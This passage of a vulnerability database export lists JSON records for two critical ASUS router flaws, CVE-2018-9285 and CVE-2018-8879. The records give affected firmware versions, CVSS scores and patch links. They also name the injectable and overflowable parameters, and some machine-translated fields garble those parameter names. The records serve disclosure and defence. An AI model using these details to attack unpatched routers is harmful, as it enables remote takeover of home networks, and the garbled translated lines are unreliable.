            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n18u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac68u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac88u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac86u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac1900",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac2900",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac3100 \u003c3.0.0.4.384 10007",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.246"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.354"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.260"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.374.5047"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.374_4887"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.140"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.374.4755"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.220"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.270"
          },
          {
            "model": "rt-ac68u",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "asus",
            "version": "3.0.0.4.374_4561"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac1900_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac3100_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac3200_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac5300_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac87u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac88u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n18u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "b1ack0wl",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2018-9285",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-9285",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-63980",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-139317",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-9285",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-9285",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-9285",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-63980",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201804-298",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-139317",
                "trust": 0.1,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2018-9285",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285"
          }
        ],
        "trust": 2.34
      },
      "exploit_availability": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "reference": "https://www.scap.org.cn/vuln/vhn-139317",
            "trust": 0.1,
            "type": "unknown"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          }
        ]
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-9285",
            "trust": 3.2
          },
          {
            "db": "PACKETSTORM",
            "id": "160049",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298",
            "trust": 0.7
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2020110103",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "id": "VAR-201804-1341",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          }
        ],
        "trust": 1.297841215
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:06:52.257000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.asus.com/sg/"
          },
          {
            "title": "Patch for ASUS TM-AC1900 arbitrary command execution vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/240217"
          },
          {
            "title": "Multiple ASUS Product operating system command injection vulnerability fixes",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=83120"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-78",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "http://packetstormsecurity.com/files/160049/asus-tm-ac1900-arbitrary-command-execution.html"
          },
          {
            "trust": 2.6,
            "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html"
          },
          {
            "trust": 1.8,
            "url": "https://fortiguard.com/zeroday/fg-vd-17-216"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9285"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-9285"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2020110103"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/78.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-11-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "date": "2018-04-04T00:00:00",
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "date": "2018-04-04T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "date": "2018-06-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "date": "2018-04-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "date": "2018-04-04T19:29:00.687000",
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-11-18T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-63980"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-139317"
          },
          {
            "date": "2020-11-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2018-9285"
          },
          {
            "date": "2018-06-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          },
          {
            "date": "2020-11-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          },
          {
            "date": "2024-11-21T04:15:17.713000",
            "db": "NVD",
            "id": "CVE-2018-9285"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  ASUS In product  OS Command injection vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-004344"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "operating system commend injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201804-298"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201911-1650

    Vulnerability from variot - Updated: 2024-11-23 22:05

    Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1650",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac66u",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.382.50470"
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "asuswrt-merlin",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          }
        ]
      },
      "cve": "CVE-2018-8879",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2018-8879",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-02713",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2018-8879",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2018-8879",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-8879",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-8879",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-02713",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201911-1254",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-8879",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-016158"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-1254"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-8879"
          }
        ]
      },
      "id": "VAR-201911-1650",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          }
        ],
        "trust": 1.1596695499999998
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-02713"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:05:56.126000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
